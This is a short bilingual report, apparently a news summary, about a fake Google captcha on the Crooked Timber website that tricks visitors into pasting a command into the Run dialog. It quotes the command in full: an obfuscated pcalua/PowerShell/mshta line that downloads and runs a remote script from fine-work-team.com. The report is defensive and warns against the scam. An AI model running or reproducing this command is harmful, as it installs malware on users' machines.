访问Crooked Timber网站的用户遭遇了一次网络钓鱼攻击[1]。该恶意页面伪装成Google验证码的形式,试图诱导用户执行含有PowerShell命令的脚本[1]。
该恶意页面声称需要用户按下Win+R和Ctrl+V组合键来运行命令以验证是否为真人[1]。其中的PowerShell命令旨在从远程URL(fine-work-team.com)下载并执行恶意脚本,具体命令为"pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi""[1]。用户及时识别了这一威胁并向大语言模型咨询,后者明确建议不要运行该命令[1]。
A visitor to the Crooked Timber website encountered a fraudulent verification page designed to deceive users into executing malicious code [1]. The fake captcha mimicked Google's authentication interface and instructed users to press Win+R and paste a command to verify they were human [1].
The command in question contained encoded PowerShell instructions intended to download and execute a script from the remote server fine-work-team.com [1]. Specifically, the malicious payload read: "pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi"" [1]. The user recognized the threat, consulted an AI language model for guidance, and did not execute the command [1]. When advised about the nature of the code, the language model strongly warned against running it [1].